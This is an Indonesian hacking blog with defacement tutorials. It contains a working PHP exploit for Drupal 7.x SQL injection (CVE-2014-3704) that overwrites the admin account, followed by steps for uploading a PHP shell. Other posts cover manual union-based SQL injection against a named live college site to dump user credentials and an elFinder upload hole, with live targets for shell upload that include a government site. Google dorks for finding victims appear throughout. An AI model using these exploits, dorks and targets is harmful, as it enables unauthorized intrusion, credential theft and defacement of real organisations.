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Kamis, 12 September 2019

Deface Metode Drupal 7.x Sql Injection + Upload Shell

Hi Gan Welcome Back :v
Kali Nih Adalah Tutorial Site Yg Menggunakan Cms
Drupal 7.x Sql Injection + Upload Shell
Yg Di Butuhkan
- Shell C99
- Dork
- Kopi
Dork : intext:"powered by drupal" site:id
inurl: Powered by Drupal
inurl:"node/add/article" site:id
( Kembangin Lagi )
Kalian Bisa Comot Drupal Di bawah nih Terus Kalian save ( php ) upload di lolcahost Kalian atau Upload Di Web Yg Kalian Upload shell
Comot bro .
<?php ?>  <!Doctype HTML>
<title>Drupal Exploit by ./Fell Ganns</title>
<div class="mymargin">
<font color="red"><h1>Drupal Exploit Sql Injection + Upload Shell by ./Fell Ganns</h1></font>

<form method="GET" action="">
Site : <input type="text" name="url" placeholder="Example: www.site.com">
<input type="submit" name="submit" value="suck it !">
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin D&#1043;rr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
$file = fopen("rock-you.txt", "a");
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'];
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '/user/login/', null, $ctx);
    echo "<h4>Scanning at \"/user/login/</h4>\"";
    if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
        fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'] . "/";
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
    echo "<h4>Scanning at \"Index</h4>\"";
    if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
        fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";


Kalian Buka Kira Kira Kalo Vuln Bikin
Tinggal Kalian Klik Web nya https://kntl.com/user/login
terus Kalian Login username ny : fuckyou
Password ny : admin
Nah Kalau Sudah Login ke https://kntl.com/node/add/article
Dan Pilih php Lalu Save
Duarr MemeQ Nah Bisa Kalian Apakan Saja Bebas Just Have Fun 😁
Oke Cukup sekian Bay
Next To 😀

Minggu, 08 September 2019

Deface Metode Sql Injection ( Manual )

Hi Asalamualaikum Wr.Wb
Welcome Back Babi :v Kali Nih Ada Tutorial Deface Metode Sql Injection ( Manual ) Oke Gass Saja Udah Malem Mau Tidur :v
- Dork
- Roko
- Kopi
Dork : inurl:news.php?id= site:
inurl:gallery.php?id= site:
inurl:index.php?id= site:
( Kembangin Lagi )
Live Target : http://www.maldacollege.ac.in/current-news.php?id=35

Mula Mula Kasih Tanda ' di belakang Nya seperti Ni

Cari Sampai Eror Gan :v
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+1-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+2-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+3-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+4-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+5-- <- Eror

Berarti database nya 4 gan
Cara Selanjut nya union+select
Nah Habis itu @@version atau version()  buat liat versi berapa sql nya
Angka Togel Nya 5 rebu gan :v Oke Lanjut tod
Habis itu group_concat(table_name) di angka muncul tadi dan

perintah +from+information_schema.tables+where+table_schema=database()--

di akhir angka jadi macam nih
Oke Lanjut Muncul Table Banyak Di Situ :v tahap selanjutnya mengekstrak kata2 yang mau di dump database nya di sini gw mau dump user_details setelah di etrax decimalnya adalah 757365725f64657461696c73
Bingung Cara Extrax Nya di sini  http://string-functions.com/string-hex.aspx
Nah Oke Lanjut Sekarang group_concat(column_name) <yang tadi nya table ganti jadi column dan di akhir angak tambahin

from+information_schema.columns+where+table_name=0xhasil luextra tadi--

jangan lupa mengugunakan 0x << itu
+from+nameyang tadi di dumb-- <- Yang di akhir angka jadi seperti itu
Keluar dah Babi Username Sama Password Nya Tinggal Kalian Hash Sendiri Login ? Di Itu keliatan hehe
Oke Bay Sekian Dulu
Good Bay Next To 😁

Kamis, 05 September 2019

Bug Website Pada Gojek.com

Hi Gan Kembali Lagi ea
Kali Nih Adalah Bug Website Pada Website Transportasi Terbesar di Indonesia ya itu ( gojek.com )
Bug Nih Cukup Berbahaya Kemungkin Para Attacker Bisa Meng Upload File Mereka Atau Pun Shell Mereka
Bug Website GoJek

#- Title: Bug Website GoJek 
#- Author: Tidak dipastikan
#- Published : 7-7-2018
#- Developer : Team Go-Jek
#- Fixed in Version : -
#- Tested on : windows


Proof Of Concept 
Gojek Memiliki Bug Ke Amanan Pada Website Nya
Ya itu Bug Elfinder 2.0 - FileManager for web ( rc1 ) File Upload Vurlnerbility
.php .html .phtml .jpg .gif.

Cukup Besar Bug Nya Yah
Ternyata Benar saja Di sini Kita Bisa Upload File Kita

Sama Seperti Deface Metode Elfinder v 2.0 Upload Shell
inurl:/elfinder v 2.0 ext:phtml
( Kembangin Lagi )
Exploit :
http://site.com/[path]/elfinder/elfinder.php.html http://site.com/[path]/elfinder/src/elfinder-src.php.html
Live Target : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder.phtml

Di situ kalian Upload File ? Atau Pun shell kalian Terserah Bebas hehe
Oke Lah Cukup Sekian
Bayy Next To 😁

Mantan PHP Backdoor

Welcome Back Bro. Kali Nih Adalah Tutorial Cara Jumping Ke Server Web Lain Yg Tersembunyi Pernah Kan Kalian Pas Udah Upload Shell Habis I...